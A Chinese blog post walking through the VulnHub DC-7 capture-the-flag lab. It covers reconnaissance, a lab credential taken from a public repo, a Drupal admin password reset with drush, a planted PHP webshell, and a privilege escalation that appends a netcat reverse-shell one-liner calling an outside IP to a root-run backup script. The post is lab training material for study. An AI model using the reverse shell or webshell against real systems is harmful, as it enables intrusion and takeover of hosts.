VulnHub——DC-7

最新推荐文章于 2024-08-12 13:15:41 发布
最新推荐文章于 2024-08-12 13:15:41 发布
阅读量319 收藏 1
点赞数
分类专栏: VulnHub 文章标签: 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37043565/article/details/112095116
版权

DC-7

靶机链接

难度:一般(原文为“While this isn’t an overly technical challenge, it isn’t exactly easy.”)

提示way不在box中。(英文很菜,不知道怎么翻译这句。)

信息搜集

1、使用Nmap探测靶机并进行详细扫描。
在这里插入图片描述
在这里插入图片描述

2、访问80端口搜集信息。

在这里插入图片描述
在这里插入图片描述

提示way在盒子之外,结合给出的@DC7USER
Google搜索DC7USER。
在这里插入图片描述
在这里插入图片描述

所以在kali上运行命令将文件下载至本地。

git clone  https://github.com/Dc7User/staffdb

从config.php中发现数据库用户名密码。
在这里插入图片描述
dc7user:MdR3xOgB7#dW

漏洞挖掘与利用

使用ssh登录
在这里插入图片描述

backups中有两个加密文件无法读取。
在这里插入图片描述

查看dc7user中的mbox。
在这里插入图片描述

从格式上看文件应该是邮件。
从内容上看:
在这里插入图片描述
查看该文件。
在这里插入图片描述

只有drush这个命令不知道有什么用。
在这里插入图片描述

搜索后发现,可以进行更改密码。
在这里插入图片描述

无法修改root用户,搜索后发现只能在网站根目录使用此命令进行修改密码。
在这里插入图片描述

尝试更改drupal的admin用户密码。
在这里插入图片描述

登录drupal
由于Drupal为了安全,将php打包为单独的模块,所以需要先安装php模块
安装并启动后,在修改主页代码,插入php木马代码,并将文本格式改为php代码。
在这里插入图片描述

使用shell链接。
在这里插入图片描述

提权

之前得知backups.sh拥有者为www-data。
所以使用冰蝎反弹shell。
在这里插入图片描述

该工具还可以用来反弹到Metepreter。又有本靶机不需要进行后渗透测试以及横向移动,所以只进行Shell反弹。

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.3.44 9876 >/tmp/f" >> backups.sh

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

Anranaaaa
关注
专栏目录
Vulnhub靶机渗透学习——DC-9
qq_45612828的博客
07-02 3131
Vulnhub靶机渗透学习——DC-9
Vulnhub靶机——DC-1
流水不争先,争的是滔滔不绝
04-18 894
Vulnhub靶机——DC-1,cms(Drupal 7)存在框架漏洞,msf利用框架漏洞拿到普通用户的shell,再通过SUID提权
Vulnhub靶机渗透测试——DC-4
Cobra的博客
05-03 1785
一、实验环境 攻击机(kail):192.168.189.148 靶机(ubuntu):192.168.189.183 二、信息收集 1、使用nmap进行主机发现 nmap 192.168.189.0/24 2、发现IP192.168.189.183,再使用nmap对其进行扫描 nmap -sV -A -T4 -p- 192.168.189.183 3、发现其开放80,22端口,访问其80端口,是一个登录框 4、在对其进行SQL注入,目录扫描无果后,果断选择暴力破解..
Vulnhub靶机渗透测试——DC-1
Cobra的博客
04-12 2564
Vulnhub靶机渗透测试实战——DC-1 一、实验环境 攻击机(kali): 192.168.189.148 靶机(ubuntu): 192.168.189.172] 二、信息收集 1、使用nmap扫描进行主机发现 nmap 192.168.189.0/24 2、发现IP为192.168.189.172主机开放80和22等端口,访问其80端口 三、漏洞利用 1、发现该站点是由Drupal搭建,利用msf进行漏洞利用 use exploit/unix/webapp/drupal_drupalgedd
看完这篇 教你玩转渗透测试靶机vulnhub——DC3
热门推荐
Aluxian_的博客
03-23 1万+
Vulnhub靶机DC3渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:漏洞发现:③:SQL注入:④:文件上传:⑤:提权: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 从靶机DC-3开始,只有一个最终的flag,只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载:
Vulnhub靶机渗透测试——DC-3
Cobra的博客
04-26 3422
一、实验环境 攻击机(kali): 192.168.189.148 靶机(ubuntu16.04): 192.168.189.182 靶机下载地址:DC: 3.2 ~ VulnHub 二、信息收集 1、使用nmap扫描存活主机 2、发现IP192.168.189.182开放80端口,再对其进行nmap扫描 nmap -sV -A -T4 192.168.189.182 3、通过扫描结果我们发现其指纹信息为joomla,访问其80端口 4、使用dirsearch对其进行目.
vulnhub靶场——DC-1
pigzlfa的博客
08-12 733
下载后解压得到一个ova文件,直接vmware打开(这里我workstation pro17导入会报错,“未通过ovf规范一致性或虚拟硬件合规性检查”没留下截图,查了好多,最后点了重试,结果就就好了- -)这里把靶机和攻击机用同一种模式连接(都是NAT或者都是桥接),保证俩在同一网段,攻击机能访问到就行。有问题,问百度,so,目标有了,去找/sites/default/settings.php。整理一些思路,目前知道了一个flag4的账户,密码未知,还提示让提权root
vulnhub-DC-1渗透测试
遇事不决冲冲冲
11-21 6421
环境搭建 官网https://download.vulnhub.com/dc/DC-1.zip 将ova直接拖到vmware中,第一次还是失败重试后成功 刚开始遇到了点小问题,环境搭建好后利用kali nmap扫不到,并且启动靶机时一直报驱动的错。解决方法就是将桥接模式换成NAT模式(“桥接”和“NAT”方式区别),然后移除CD/DVD(IDE) 思路 首先nmap扫描ip地址及端口号,进入web页面发现一个7版本的Drupal,利用msf中已存的漏洞可以直接打进去并且发现flag1并且提示配置文件,通过
Vulnhub靶机渗透测试——DC-5
Cobra的博客
05-11 1022
一、实验环境 攻击机(kali): 192.168.189.148 靶机(ubuntu): 192.168.189.184 靶机下载地址: 二、信息收集 1、使用nmap进行存活主机探测 nmap 192.168.189.0/24 2、发现IP192.168.189.184开放80,111端口,再次使用nmap对其进行扫描 nmap 192.168.189.184 -sV -T4 -A -p- 3、访问其80端口 4、浏览页面并没有发现可以进行漏洞利用的地方,使用
Vulnhub靶机实战——DC-7
冠霖L的博客
10-29 5007
靶机DC-7下载地址:https://download.vulnhub.com/dc/DC-7.zip 环境:VMware 15虚拟机软件 DC-7靶机IP地址:192.168.220.154 Kali的IP地址:192.168.220.155 DC-6靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.155...
Vulnhub靶机实战——DC-3
冠霖L的博客
09-27 9115
靶机DC-3下载地址:https://download.vulnhub.com/dc/DC-3.zip 靶机DC-3VMware下载地址:https://download.vulnhub.com/dc/DC-3VMware.zip 注:开始将DC-3.ova文件导入VMware虚拟机,发现无法获取到靶机IP地址,作者在DC-3靶机下载页面提到可以下载已经搭建好的DC-3VMware,然...
Vulnhub靶机实战——DC-2
冠霖L的博客
09-27 4810
靶机DC-2下载地址:https://download.vulnhub.com/dc/DC-2.zip 描述:靶机DC-2与DC-1一样,共有5个flag,但最终需要root权限才可以找到并查看flag 环境:Vmware 15 Pro虚拟机软件 DC-1靶机IP地址:192.168.220.132 Kali的IP地址:192.168.22...
Vulnhub靶机实战——DC-5
冠霖L的博客
10-27 4940
靶机DC-5下载地址:https://download.vulnhub.com/dc/DC-5.zip 环境:VMware 15虚拟机软件 DC-5靶机IP地址:192.168.220.139 Kali的IP地址:192.168.220.145 DC-5靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.145 ...
Vulnhub靶机实战——DC-1
冠霖L的博客
09-27 1985
靶机DC-1下载地址:https://download.vulnhub.com/dc/DC-1.zip 描述:靶机DC-1共有5个flag,并且需要root权限才可以找到并查看flag 环境:Vmware 15 Pro虚拟机软件 DC-1靶机IP地址:192.168.220.130 Kali的IP地址:192.168.220.131 本...
python摄影交流平台代码
最新发布
09-26
python摄影交流平台代码python摄影交流平台代码python摄影交流平台代码python摄影交流平台代码python摄影交流平台代码python摄影交流平台代码python摄影交流平台代码
线上辅导班系统-线上辅导班系统-线上辅导班系统-线上辅导班系统-线上辅导班系统-线上辅导班系统-线上辅导班系统-线上辅导班系统
09-26
线上辅导班系统-线上辅导班系统-线上辅导班系统-线上辅导班系统-线上辅导班系统-线上辅导班系统-线上辅导班系统-线上辅导班系统-线上辅导班系统-线上辅导班系统-线上辅导班系统-线上辅导班系统 1、资源说明:线上辅导班系统源码,本资源内项目代码都经过测试运行成功,功能ok的情况下才上传的。 2、适用人群:计算机相关专业(如计算计、信息安全、大数据、人工智能、通信、物联网、自动化、电子信息等)在校学生、专业老师或者企业员工等学习者,作为参考资料,进行参考学习使用。 3、资源用途:本资源具有较高的学习借鉴价值,可以作为“参考资料”,注意不是“定制需求”,代码只能作为学习参考,不能完全复制照搬。需要有一定的基础,能够看懂代码,能够自行调试代码,能够自行添加功能修改代码。 4. 最新计算机软件毕业设计选题大全(文章底部有博主联系方式): https://blog.csdn.net/2301_79206800/article/details/135931154 技术栈、环境、工具、软件: ① 系统环境:Windows ② 开发语言:Java ③ 框架:SpringBoot ④ 架构:B/S、M
Java-ssm-jsp基于微信小程序的校园二手物品交易系统实现源码(源代码+说明文档)
09-26
首页:首页可以看到所有类别的二手物品。 全部:可以看到不同类别,比如电子产品、服装等商品信息 发布:可以发布自己的二手物品 我的:个人中心中主要是针对自己的信息资料进行查询管理,主要内容那肯定就会有对于个人资料的修改操作还有我们管理人员经常把修改密码和我的收藏放在一起的功能操作了。 项目关键技术 开发工具:IDEA 、Eclipse 编程语言: Java 数据库: MySQL5.7+ 后端技术:ssm 前端技术:jsp 关键技术:jsp、spring、ssm、MYSQL、MAVEN 数据库工具:Navicat、SQLyog
基于 C++ 实现(控制台)图书馆管理系统
09-26
第 1.1 节 软件编写目的 目的:为实现图书管理的信息化、简单化,增加图书管理的功能,减轻图书管理员的劳动负担,及时、准确地反馈 图书信息。 此软件具备完整显示书籍清单、借还书操作简便、准确反馈书籍信息等功能,适用于闭环管理的图书馆,应用于学 生、教师等在闭环管理范围之内的人群。 第 1.2 节 项目背景 北京化工大学小学期 C 语言程序实训:图书馆管理系统 第 1.3 节 定义 项目符合标准C 语言的代码定义 第 1.4 节 参考资料 a.选题来源:北京化工大学小学期 C 语言程序设计实训:图书管理系统 b.项目遵循的许可 Apache License 2.0 第 1.5 节 软件功能说明 软件结构分为 sign(),menu(),ist0,borrow0),ret0),update0,menu ykO,lis yk0. 其功能分别为:sign0读取文件中的账号密码验证登录,识别用户权限登录,游客模式进入; menu0显示功能,输入之后进入对应菜单,异常处理, list0)把书的列表从文件中读出并 print 在屏幕上; borrow()查找图书,全局模糊查询(书名,作者,出版社
DC-DC电路电感选择深度解析
"DC-DC电路中电感的选择关乎到开关电源设计的效率与稳定性。电感不仅是LC滤波电路的组成部分,其行为在开关电源的降压转换中扮演着关键角色。电感的选择需要考虑电感值、电流承受能力、绕线电阻以及机械尺寸等因素。...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值